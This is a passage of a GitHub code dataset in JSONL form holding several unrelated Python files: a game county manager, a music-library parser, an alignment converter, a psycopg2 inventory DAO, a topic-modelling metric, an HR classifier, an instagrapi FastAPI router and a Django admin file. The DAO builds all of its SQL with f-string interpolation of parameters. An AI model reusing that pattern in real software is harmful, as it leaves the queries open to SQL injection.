c[\"name\"]\n county.unlock_cost = c[\"unlock_cost\"]\n county.unlocked = c[\"unlocked\"]\n county.wage = c[\"wage\"]\n county.rent = c[\"rent\"]\n county.tithes = c[\"tithes\"]\n county.load_flag(\"images/\" + c[\"flag\"] + \".xp\")\n\n self.counties[county.name] = county\n\n def get_county(self, name):\n if name in self.counties:\n return self.counties[name]\n else:\n return None\n\n def get_selected_county(self):\n return self.get_county(self.selected_county)\n\n def add_activity(self, type):\n self.get_selected_county().add_activity(type)\n\n def remove_activity(self, type):\n return self.get_selected_county().remove_activity(type)\n\n def process_all_activites(self):\n effects = {}\n for county in self.counties.values():\n effects[county.name] = county.process_activities()\n\n return effects\n\n def unlock_selected_county(self):\n self.get_selected_county().unlocked = True\n self.get_selected_county().threat = 0\n\n def enact_policy(self, type):\n self.get_selected_county().enact_policy(type)\n\n \n", "repo_name": "rSherriff/swing", "sub_path": "counties/county_manager.py", "file_name": "county_manager.py", "file_ext": "py", "file_size_in_byte": 1583, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "json.load", "line_number": 13, "usage_type": "call"}, {"api_name": "counties.county.County", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "31527559956", "text": "import xml.etree.ElementTree as ET\nimport pandas as pd\nimport time\n\ndef getTracksFromXML(xmlFile):\n \"\"\"XML File => list of XML dicts\"\"\"\n tree = ET.parse(xmlFile)\n root = tree.getroot()\n mainDict = root.findall('dict')\n \n for item in list(mainDict[0]):\n if item.tag=='dict':\n tracksDict = item\n break\n trackList = list(tracksDict.findall('dict'))\n tracksList = []\n for item in trackList:\n tracksList.append(list(item))\n \n return tracksList\n\ndef tracksAsLists(xmlDicts):\n \"\"\"List of XML Dicts => list of XML elements\"\"\"\n tracksList = []\n for item in xmlDicts:\n tracksList.append(list(item))\n return tracksList\n\ndef createDF(xmlFile, cols):\n \"\"\"list of XML elements => Dataframe\"\"\"\n trackDicts = getTracksFromXML(xmlFile)\n trackListXML = tracksAsLists(trackDicts)\n\n df = pd.DataFrame(columns = cols)\n dict = {}\n for i in range(len(trackListXML)):\n for j in range(len(trackListXML[i])):\n if trackListXML[i][j].tag == 'key':\n if trackListXML[i][j].text not in cols:\n continue\n dict[trackListXML[i][j].text] = trackListXML[i][j+1].text \n listKeys = [i for i in dict.keys()]\n listVals = [j for j in dict.values()]\n dfTemp = pd.DataFrame([listVals], columns = listKeys)\n df = pd.concat([df, dfTemp], axis = 0, ignore_index = True, sort = True)\n print(f'Track {i+1} of {len(trackListXML)}')\n return df\n\ndef compareWeeklyDFs(dfLastWeek, dfThisWeek):\n \"\"\"df1, df2 => df3\"\"\"\n dfOut = dfThisWeek.copy()\n dfOut['Play Count'] = dfThisWeek['Play Count'].astype(int) - dfLastWeek['Play Count'].astype(int)\n dfOut = dfOut[dfOut['Play Count'] != 0]\n dfOut['Play Count'].fillna(dfThisWeek['Play Count'], inplace = True)\n dfOut['Play Count'] = dfOut['Play Count'].astype(int)\n\n return dfOut\n\n\n\n# The columns I am interested in comparing week-by-week\ncols = ['Track ID', 'Name', 'Artist', 'Album', 'Total Time',\n 'Date Added', 'Play Count']\n\ndf1 = createDF('Library09_21_23.xml', cols)\ndf2 = createDF('Library09_22_23.xml', cols)\ndf3 = compareWeeklyDFs(df1, df2)\ndf3.sort_values(by=['Play Count'], ascending=False, inplace=True)\ndf3.reset_index(inplace = True)\n\nfileTitle = time.strftime('%y_%m_%d')\nfileTitle = fileTitle + 'Listening.csv'\n\ndf3.to_csv(fileTitle)\n", "repo_name": "ecb49/AppleMusicWeekly", "sub_path": "parseLib.py", "file_name": "parseLib.py", "file_ext": "py", "file_size_in_byte": 2388, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "xml.etree.ElementTree.parse", "line_number": 7, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 7, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 34, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 44, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 45, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 71, "usage_type": "call"}]} +{"seq_id": "42659315265", "text": "#!/usr/bin/env python3\nimport os\nfrom Bio import AlignIO\n\nos.chdir('/Users/kika/programs/tRNAscan-SE_CM_alignments/isotype_specific/Eukaryota/')\nstockholms = [x for x in os.listdir() if x.endswith('.sto')]\n\nfor stockholm in stockholms:\n\tprint(stockholm)\n\tname = stockholm.split('.sto')[0]\n\trecord = AlignIO.parse(stockholm, 'stockholm')\n\twith open('{}.aln'.format(name), 'w') as result:\n\t\tAlignIO.write(record, result, 'fasta')\n", "repo_name": "kikinocka/ngs", "sub_path": "py_scripts/sto_to_fasta.py", "file_name": "sto_to_fasta.py", "file_ext": "py", "file_size_in_byte": 428, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.chdir", "line_number": 5, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 6, "usage_type": "call"}, {"api_name": "Bio.AlignIO.parse", "line_number": 11, "usage_type": "call"}, {"api_name": "Bio.AlignIO", "line_number": 11, "usage_type": "name"}, {"api_name": "Bio.AlignIO.write", "line_number": 13, "usage_type": "call"}, {"api_name": "Bio.AlignIO", "line_number": 13, "usage_type": "name"}]} +{"seq_id": "36664634127", "text": "import psycopg2\nimport traceback\nfrom backend.DBManager import DBManager\nfrom backend.EstoqueProduto import EstoqueProduto\n\nclass EstoqueProdutoDAO:\n\n def listar_todos(self) -> list:\n \"retorna todos os estoque_produtos\"\n\n estoque_produto_list = []\n try:\n connection = DBManager.connect_with_database()\n\n cursor = connection.cursor()\n cursor.execute(\"SELECT estoque_id, produto_id, quantidade FROM estoque_produto\")\n\n rows_in_table = cursor.fetchall()\n for row in rows_in_table:\n ep = EstoqueProduto()\n ep.estoque_id = row[0]\n ep.produto_id = row[1]\n ep.quantidade = row[2]\n\n estoque_produto_list.append(ep)\n\n except (Exception, psycopg2.Error) as error:\n traceback.print_exc()\n finally:\n if connection:\n cursor.close()\n connection.close()\n return estoque_produto_list\n\n\n def listar(self, _estoque_id, _produto_id) -> EstoqueProduto:\n \"retorna uma linha de estoque_produto. Param: estoque_id e produto_id\"\n\n estoque_produto = None\n\n try:\n connection = DBManager.connect_with_database()\n\n cursor = connection.cursor()\n cursor.execute(f\"SELECT estoque_id, produto_id, quantidade FROM estoque_produto WHERE estoque_id = {_estoque_id } AND produto_id = {_produto_id}\")\n\n row = cursor.fetchone()\n\n if row is not None and len(row) > 0:\n estoque_produto = EstoqueProduto()\n estoque_produto.estoque_id = row[0]\n estoque_produto.produto_id = row[1]\n estoque_produto.quantidade = row[2]\n\n\n except (Exception, psycopg2.Error) as error:\n traceback.print_exc()\n finally:\n if connection:\n cursor.close()\n connection.close()\n return estoque_produto\n \n\n def adicionar(self, _estoque_id, _produto_id, _quantidade) -> bool:\n \"Adiciona um novo estoque_produto no banco de dados. params: estoque_id, produto_id e quantidade\"\n\n success = False\n try:\n connection = DBManager.connect_with_database()\n\n cursor = connection.cursor()\n cursor.execute(f\"INSERT INTO estoque_produto ( estoque_id, produto_id, quantidade) VALUES ({_estoque_id}, {_produto_id}, {_quantidade})\")\n \n connection.commit()\n\n if cursor.rowcount == 1:\n success = True\n\n except (Exception, psycopg2.Error) as error:\n traceback.print_exc()\n finally:\n if connection:\n cursor.close()\n connection.close()\n return success\n \n\n def atualizar(self, _estoque_id, _produto_id, _quantidade) -> bool:\n \"Atualiza a quantidade de produtos de um estoque no banco de dados. params: estoque.id, produto.id e quantidade\"\n\n success = False\n try:\n connection = DBManager.connect_with_database()\n\n cursor = connection.cursor()\n cursor.execute(f\"UPDATE estoque_produto SET quantidade = {_quantidade} WHERE estoque_id = {_estoque_id } AND produto_id = {_produto_id}\")\n connection.commit()\n if cursor.rowcount == 1:\n success = True\n except (Exception, psycopg2.Error) as error:\n traceback.print_exc()\n finally:\n if connection:\n cursor.close()\n connection.close()\n return success\n\n\n def remover(self, _estoque_id, _produto_id) -> bool:\n \"Remove um produto em um estoque. params: estoque.id e produto.id\"\n\n success = False\n try:\n connection = DBManager.connect_with_database()\n\n cursor = connection.cursor()\n cursor.execute(f\"DELETE FROM estoque_produto WHERE estoque_id = {_estoque_id} AND produto_id = {_produto_id}\")\n connection.commit()\n if cursor.rowcount == 1:\n success = True\n except (Exception, psycopg2.Error) as error:\n traceback.print_exc()\n finally:\n if connection:\n cursor.close()\n connection.close()\n return success", "repo_name": "paulohgs/wofi", "sub_path": "backend/EstoqueProdutoDAO.py", "file_name": "EstoqueProdutoDAO.py", "file_ext": "py", "file_size_in_byte": 4306, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "backend.DBManager.DBManager.connect_with_database", "line_number": 13, "usage_type": "call"}, {"api_name": "backend.DBManager.DBManager", "line_number": 13, "usage_type": "name"}, {"api_name": "backend.EstoqueProduto.EstoqueProduto", "line_number": 20, "usage_type": "call"}, {"api_name": "psycopg2.Error", "line_number": 27, "usage_type": "attribute"}, {"api_name": "traceback.print_exc", "line_number": 28, "usage_type": "call"}, {"api_name": "backend.DBManager.DBManager.connect_with_database", "line_number": 42, "usage_type": "call"}, {"api_name": "backend.DBManager.DBManager", "line_number": 42, "usage_type": "name"}, {"api_name": "backend.EstoqueProduto.EstoqueProduto", "line_number": 50, "usage_type": "call"}, {"api_name": "psycopg2.Error", "line_number": 56, "usage_type": "attribute"}, {"api_name": "traceback.print_exc", "line_number": 57, "usage_type": "call"}, {"api_name": "backend.EstoqueProduto.EstoqueProduto", "line_number": 36, "usage_type": "name"}, {"api_name": "backend.DBManager.DBManager.connect_with_database", "line_number": 70, "usage_type": "call"}, {"api_name": "backend.DBManager.DBManager", "line_number": 70, "usage_type": "name"}, {"api_name": "psycopg2.Error", "line_number": 80, "usage_type": "attribute"}, {"api_name": "traceback.print_exc", "line_number": 81, "usage_type": "call"}, {"api_name": "backend.DBManager.DBManager.connect_with_database", "line_number": 94, "usage_type": "call"}, {"api_name": "backend.DBManager.DBManager", "line_number": 94, "usage_type": "name"}, {"api_name": "psycopg2.Error", "line_number": 101, "usage_type": "attribute"}, {"api_name": "traceback.print_exc", "line_number": 102, "usage_type": "call"}, {"api_name": "backend.DBManager.DBManager.connect_with_database", "line_number": 115, "usage_type": "call"}, {"api_name": "backend.DBManager.DBManager", "line_number": 115, "usage_type": "name"}, {"api_name": "psycopg2.Error", "line_number": 122, "usage_type": "attribute"}, {"api_name": "traceback.print_exc", "line_number": 123, "usage_type": "call"}]} +{"seq_id": "30190040844", "text": "from __future__ import division\nfrom math import isnan\n\nimport sys\n\n# from django.db import transaction\n\nfrom numpy import dot, zeros\nfrom numpy.linalg import norm\n\nfrom topic_modeling.visualize.models import Dataset, WordType\nfrom topic_modeling.visualize.models import PairwiseDocumentMetric\nfrom topic_modeling.visualize.models import PairwiseDocumentMetricValue\nfrom django.db.models.aggregates import Count\n\nmetric_name = \"Word Correlation\"\n\n# @transaction.commit_manually\ndef add_metric(database_id, dataset, analysis):\n dataset = Dataset.objects.using(database_id).get(name=dataset)\n analysis = dataset.analyses.get(name=analysis)\n metric, created = analysis.pairwisedocumentmetrics.get_or_create(name=metric_name, analysis=analysis)\n if not created:\n raise RuntimeError(\"%s is already in the database for this analysis\" % metric_name)\n \n word_types = WordType.objects.filter(tokens__document__dataset=dataset).all()\n type_idx = dict((word_type,i) for i,word_type in enumerate(word_types))\n documents = dataset.documents.all()\n\n docwordvectors = [document_word_vector(type_idx, doc) for doc in documents]\n vectornorms = [norm(vector) for vector in docwordvectors]\n \n for i, doc1 in enumerate(documents):\n write('.')\n doc1_word_vals = docwordvectors[i]\n doc1_norm = vectornorms[i]\n for j, doc2 in enumerate(documents):\n doc2_word_vals = docwordvectors[j]\n doc2_norm = vectornorms[j]\n correlation_coeff = pmcc(doc1_word_vals, doc2_word_vals, doc1_norm,\n doc2_norm)\n if not isnan(correlation_coeff):\n PairwiseDocumentMetricValue.objects.using(database_id).create(\n document1=doc1, document2=doc2, metric=metric, value=correlation_coeff)\n # transaction.commit()\n write('\\n')\n\ndef write(s):\n sys.stdout.write(s)\n sys.stdout.flush()\n\ndef metric_names_generated(_dataset, _analysis):\n return [metric_name]\n\n\ndef pmcc(doc1_topic_vals, doc2_topic_vals, doc1_norm, doc2_norm):\n return float(dot(doc1_topic_vals, doc2_topic_vals) /\n (doc1_norm * doc2_norm))\n\n\ndef document_word_vector(type_idx, document):\n document_word_vals = zeros(len(type_idx))\n for doc_wordtype_count in document.tokens.values('type__type').annotate(count=Count('type__type')):\n document_word_vals[type_idx[doc_wordtype_count['type__type']]] = doc_wordtype_count['count']\n# for i, word_type in enumerate(word_types):\n# document_word_vals[i] = document.tokens.filter(type=word_type).count()\n \n return document_word_vals\n", "repo_name": "madisonjbrooks12/topicalguide", "sub_path": "import_tool/metric/document/pairwise/word_correlation.py", "file_name": "word_correlation.py", "file_ext": "py", "file_size_in_byte": 2620, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "52", "api": [{"api_name": "topic_modeling.visualize.models.Dataset.objects.using", "line_number": 20, "usage_type": "call"}, {"api_name": "topic_modeling.visualize.models.Dataset.objects", "line_number": 20, "usage_type": "attribute"}, {"api_name": "topic_modeling.visualize.models.Dataset", "line_number": 20, "usage_type": "name"}, {"api_name": "topic_modeling.visualize.models.WordType.objects.filter", "line_number": 26, "usage_type": "call"}, {"api_name": "topic_modeling.visualize.models.WordType.objects", "line_number": 26, "usage_type": "attribute"}, {"api_name": "topic_modeling.visualize.models.WordType", "line_number": 26, "usage_type": "name"}, {"api_name": "numpy.linalg.norm", "line_number": 31, "usage_type": "call"}, {"api_name": "math.isnan", "line_number": 42, "usage_type": "call"}, {"api_name": "topic_modeling.visualize.models.PairwiseDocumentMetricValue.objects.using", "line_number": 43, "usage_type": "call"}, {"api_name": "topic_modeling.visualize.models.PairwiseDocumentMetricValue.objects", "line_number": 43, "usage_type": "attribute"}, {"api_name": "topic_modeling.visualize.models.PairwiseDocumentMetricValue", "line_number": 43, "usage_type": "name"}, {"api_name": "sys.stdout.write", "line_number": 49, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 49, "usage_type": "attribute"}, {"api_name": "sys.stdout.flush", "line_number": 50, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 50, "usage_type": "attribute"}, {"api_name": "numpy.dot", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 62, "usage_type": "call"}, {"api_name": "django.db.models.aggregates.Count", "line_number": 63, "usage_type": "call"}]} +{"seq_id": "33809906506", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed May 20 19:11:04 2020\r\n\r\n@author: Prateek Gupta\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom sklearn.preprocessing import LabelEncoder\r\nfrom sklearn.preprocessing import StandardScaler\r\nimport matplotlib.pyplot as plt \r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.metrics import r2_score\r\nfrom sklearn import linear_model\r\nfrom sklearn.model_selection import GridSearchCV, train_test_split, cross_val_score\r\n\r\ntrain=pd.read_csv(\"train.csv\")\r\ntest=pd.read_csv(\"test.csv\")\r\n\r\ntrain.head(10)\r\ntrain.describe()\r\n\r\n#imputation\r\ntrain['education']=train['education'].fillna(\"Bachelor's\")\r\ntrain['previous_year_rating']=train['previous_year_rating'].fillna(3)\r\n\r\ntrain1=train\r\n\r\n#dummy variables\r\np1=pd.get_dummies(train1[\"department\"]) \r\np2=pd.get_dummies(train1[\"education\"])\r\np3=pd.get_dummies(train1[\"recruitment_channel\"])\r\n\r\nlabelencoder_X = LabelEncoder()\r\ntrain1['gender'] = labelencoder_X.fit_transform(train1['gender'])\r\n\r\ntrain1=pd.concat([train1,p1,p2,p3],axis=1)\r\n\r\n#removing columns\r\ntrain1.drop([\"employee_id\",\"department\",\"region\",\"education\",\"recruitment_channel\",\"region\"], axis=1,inplace =True)\r\n\r\nx=train1\r\nx.drop(\"is_promoted\",axis=1,inplace=True)\r\ny=train[\"is_promoted\"]\r\n\r\n#splitting dataset\r\nx_train, x_val, y_train, y_val = train_test_split(x,y,test_size = 0.20,random_state =205)\r\nsc_X = StandardScaler()\r\nx_train = sc_X.fit_transform(x_train)\r\nx_val = sc_X.transform(x_val)\r\n\r\n#test dataset\r\ntest['education']=test['education'].fillna(\"Bachelor's\")\r\ntest['previous_year_rating']=test['previous_year_rating'].fillna(3)\r\n\r\ntest1=test\r\n\r\n#dummy variables\r\nt1=pd.get_dummies(test1[\"department\"]) \r\nt2=pd.get_dummies(test1[\"education\"])\r\nt3=pd.get_dummies(test1[\"recruitment_channel\"])\r\n\r\n\r\ntest1['gender'] = labelencoder_X.fit_transform(test1['gender'])\r\n\r\ntest1=pd.concat([test1,t1,t2,t3],axis=1)\r\n\r\n\r\n#removing columns\r\ntest1.drop([\"employee_id\",\"department\",\"region\",\"education\",\"recruitment_channel\",\"region\"], axis=1,inplace =True)\r\n\r\ntest1 = sc_X.fit_transform(test1)\r\n\r\n\r\n#implementing classifier models\r\n\r\n#####Logistic regression\r\n################################\r\n\r\nfrom sklearn.linear_model import LogisticRegression\r\n\r\nclassifier1=LogisticRegression(random_state=0)\r\nclassifier1.fit(x_train,y_train)\r\n\r\npred1=classifier1.predict(x_val)\r\ntrainpred1=classifier1.predict(x_train)\r\n\r\nfrom sklearn.metrics import confusion_matrix\r\ncm1=confusion_matrix(y_val,pred1)\r\nprint(cm1)\r\n\r\nfrom sklearn.metrics import f1_score\r\n\r\nf1_score(y_val,pred1, average='binary')\r\nf1_score(y_train,trainpred1, average='binary')\r\n\r\n#####Decision Tree Classification\r\n################################\r\n\r\nfrom sklearn.tree import DecisionTreeClassifier\r\n\r\nclassifier2=DecisionTreeClassifier(criterion=\"gini\",random_state=0,max_leaf_nodes=100,max_features=15)\r\nclassifier2.fit(x_train,y_train)\r\n\r\npred2=classifier2.predict(x_val)\r\ntrainpred2=classifier2.predict(x_train)\r\n\r\ncm2=confusion_matrix(y_val,pred2)\r\nprint(cm2)\r\n\r\nfrom sklearn.metrics import f1_score\r\n\r\nf1_score(y_val,pred2, average='binary')\r\nf1_score(y_train,trainpred2, average='binary')\r\n\r\n\r\n#####Random Forest Classification\r\n################################\r\n\r\nfrom sklearn.ensemble import RandomForestClassifier\r\n\r\nclassifier3=RandomForestClassifier(n_estimators=1000, criterion='gini', random_state=0, max_depth=100,max_features=22, min_samples_leaf=4, min_samples_split=5,max_leaf_nodes=100)\r\nclassifier3.fit(x_train,y_train)\r\n\r\npred3=classifier3.predict(x_val)\r\ntrainpred3=classifier3.predict(x_train)\r\n\r\ncm3=confusion_matrix(y_val,pred3)\r\nprint(cm3)\r\n\r\nfrom sklearn.metrics import f1_score\r\n\r\nf1_score(y_val,pred3, average='binary')\r\n#f1 score=\r\nf1_score(y_train,trainpred3, average='binary')\r\n\r\n#####Applying Artificial Neural Network\r\n################################\r\n\r\nimport keras\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense\r\n\r\nclassifier4=Sequential()\r\n\r\nclassifier4.add(Dense(output_dim=10, init='uniform',activation='relu',input_dim=19))\r\n\r\nclassifier4.add(Dense(output_dim=10, init='uniform',activation='relu'))\r\n\r\nclassifier4.add(Dense(output_dim=1, init='uniform',activation='sigmoid'))\r\n\r\nclassifier4.compile(optimizer=\"adam\",loss=\"binary_crossentropy\",metrics=[\"accuracy\"])\r\n\r\nclassifier4.fit(x_train, y_train,batch_size=10,nb_epoch=100)\r\n\r\npred4=classifier4.predict(x_val)\r\n\r\npred4=(pred4>0.30)\r\n\r\ntrainpred4=classifier4.predict(x_train)\r\ntrainpred4=(trainpred4>0.30)\r\n#confusion matrix\r\nfrom sklearn.metrics import confusion_matrix\r\ncm4=confusion_matrix(y_val,pred4)\r\nprint(cm4)\r\n\r\nfrom sklearn.metrics import f1_score\r\n\r\nf1_score(y_val,pred4, average='binary')\r\nf1_score(y_train,trainpred4, average='binary')\r\n\r\n#Applying ANN classification on final Test dataset as it gave the best f1 score\r\npred_test=classifier4.predict(test1)\r\npred_test=(pred_test>0.30)\r\nsubmission = pd.DataFrame({'employee_id': test['employee_id'] })\r\nsubmission[\"is_promoted\"]=pred_test.astype(int)\r\nsubmission.to_csv(\"HR_Analytics_submission.csv\",index=False)\r\n\r\n\r\n\r\n", "repo_name": "prateek0894/Data-Science-projects", "sub_path": "HR_Analytics.py", "file_name": "HR_Analytics.py", "file_ext": "py", "file_size_in_byte": 5036, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pandas.read_csv", "line_number": 18, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 19, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 31, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 32, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 33, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 35, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 38, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 48, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 49, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 60, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 61, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 62, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 67, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LogisticRegression", "line_number": 83, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 90, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 95, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 96, "usage_type": "call"}, {"api_name": "sklearn.tree.DecisionTreeClassifier", "line_number": 103, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 109, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 114, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 115, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestClassifier", "line_number": 123, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 129, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 134, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 136, "usage_type": "call"}, {"api_name": "keras.models.Sequential", "line_number": 145, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 147, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 149, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 151, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 165, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 170, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 171, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 176, "usage_type": "call"}]} +{"seq_id": "20846156374", "text": "import json\nfrom typing import Optional, Dict\nfrom fastapi import APIRouter, Depends, Form\nfrom dependencies import ClientStorage, get_clients\n\nrouter = APIRouter(\n prefix=\"/auth\",\n tags=[\"auth\"],\n responses={404: {\"description\": \"Not found\"}}\n)\n\n@router.post(\"/login\")\nasync def auth_login(username: str = Form(...),\n password: str = Form(...),\n verification_code: Optional[str] = Form(\"\"),\n proxy: Optional[str] = Form(\"\"),\n locale: Optional[str] = Form(\"\"),\n timezone: Optional[str] = Form(\"\"),\n clients: ClientStorage = Depends(get_clients)) -> str:\n \"\"\"Login by username and password with 2FA\n \"\"\"\n cl = clients.client()\n if proxy != \"\":\n cl.set_proxy(proxy)\n\n if locale != \"\":\n cl.set_locale(locale)\n\n if timezone != \"\":\n cl.set_timezone_offset(timezone)\n\n result = cl.login(\n username,\n password,\n verification_code=verification_code\n )\n if result:\n clients.set(cl)\n return cl.sessionid\n return result\n\n\n@router.post(\"/relogin\")\nasync def auth_relogin(sessionid: str = Form(...),\n clients: ClientStorage = Depends(get_clients)) -> str:\n \"\"\"Relogin by username and password (with clean cookies)\n \"\"\"\n cl = clients.get(sessionid)\n result = cl.relogin()\n return result\n\n\n@router.get(\"/settings/get\")\nasync def settings_get(sessionid: str,\n clients: ClientStorage = Depends(get_clients)) -> Dict:\n \"\"\"Get client's settings\n \"\"\"\n cl = clients.get(sessionid)\n return cl.get_settings()\n\n\n@router.post(\"/settings/set\")\nasync def settings_set(settings: str = Form(...),\n sessionid: Optional[str] = Form(\"\"),\n clients: ClientStorage = Depends(get_clients)) -> str:\n \"\"\"Set client's settings\n \"\"\"\n if sessionid != \"\":\n cl = clients.get(sessionid)\n else:\n cl = clients.client()\n cl.set_settings(json.loads(settings))\n cl.expose()\n clients.set(cl)\n return cl.sessionid\n\n@router.get(\"/timeline_feed\")\nasync def timeline_feed(sessionid: str,\n clients: ClientStorage = Depends(get_clients)) -> Dict:\n \"\"\"Get your timeline feed\n \"\"\"\n cl = clients.get(sessionid)\n return cl.get_timeline_feed()\n", "repo_name": "adw0rd/instagrapi-rest", "sub_path": "routers/auth.py", "file_name": "auth.py", "file_ext": "py", "file_size_in_byte": 2377, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 282, "dataset": "github-code", "pt": "52", "api": [{"api_name": "fastapi.APIRouter", "line_number": 6, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 15, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 16, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 17, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 18, "usage_type": "name"}, {"api_name": "dependencies.ClientStorage", "line_number": 19, "usage_type": "name"}, {"api_name": "fastapi.Form", "line_number": 13, "usage_type": "call"}, {"api_name": "fastapi.Form", "line_number": 14, "usage_type": "call"}, {"api_name": "fastapi.Form", "line_number": 15, "usage_type": "call"}, {"api_name": "fastapi.Form", "line_number": 16, "usage_type": "call"}, {"api_name": "fastapi.Form", "line_number": 17, "usage_type": "call"}, {"api_name": "fastapi.Form", "line_number": 18, "usage_type": "call"}, {"api_name": "fastapi.Depends", "line_number": 19, "usage_type": "call"}, {"api_name": "dependencies.get_clients", "line_number": 19, "usage_type": "argument"}, {"api_name": "dependencies.ClientStorage", "line_number": 45, "usage_type": "name"}, {"api_name": "fastapi.Form", "line_number": 44, "usage_type": "call"}, {"api_name": "fastapi.Depends", "line_number": 45, "usage_type": "call"}, {"api_name": "dependencies.get_clients", "line_number": 45, "usage_type": "argument"}, {"api_name": "dependencies.ClientStorage", "line_number": 55, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 55, "usage_type": "call"}, {"api_name": "dependencies.get_clients", "line_number": 55, "usage_type": "argument"}, {"api_name": "typing.Dict", "line_number": 55, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 64, "usage_type": "name"}, {"api_name": "dependencies.ClientStorage", "line_number": 65, "usage_type": "name"}, {"api_name": "fastapi.Form", "line_number": 63, "usage_type": "call"}, {"api_name": "fastapi.Form", "line_number": 64, "usage_type": "call"}, {"api_name": "fastapi.Depends", "line_number": 65, "usage_type": "call"}, {"api_name": "dependencies.get_clients", "line_number": 65, "usage_type": "argument"}, {"api_name": "json.loads", "line_number": 72, "usage_type": "call"}, {"api_name": "dependencies.ClientStorage", "line_number": 79, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 79, "usage_type": "call"}, {"api_name": "dependencies.get_clients", "line_number": 79, "usage_type": "argument"}, {"api_name": "typing.Dict", "line_number": 79, "usage_type": "name"}]} +{"seq_id": "9695240111", "text": "from django.contrib import admin\nfrom accounts.models.user import User\nfrom accounts.models.wallet import Wallet\n\n\nclass UserAdmin(admin.ModelAdmin):\n \"\"\"User admin class for user model in admin panel\"\"\"\n\n list_display = (\n \"id\",\n \"user_name\",\n \"is_active\",\n \"is_staff\",\n \"amount\",\n \"update_at\",\n )\n search_fields = (\"user_name\",)\n\n list_filter = (\n \"is_active\",\n \"is_staff\",\n )\n\n\nclass WalletAdmin(admin.ModelAdmin):\n \"\"\"Wallet admin for wallet model in admin panel for showing more data\"\"\"\n\n list_display = (\n \"uuid\",\n \"user\",\n \"amount\",\n \"created_at\",\n )\n search_fields = (\"user\",)\n\n\nadmin.site.register(User, UserAdmin)\nadmin.site.register(Wallet, WalletAdmin)\n", "repo_name": "houshmand-2005/Crypto_Buy_System", "sub_path": "src/accounts/admin.py", "file_name": "admin.py", "file_ext": "py", "file_size_in_byte": 779, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.contrib.admin.ModelAdmin", "line_number": 6, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 6, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 25, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 25, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 37, "usage_type": "call"}, {"api_name": "accounts.models.user.User", "line_number": 37, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 37, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 37, "usage_type": "name"}, {"api_name": 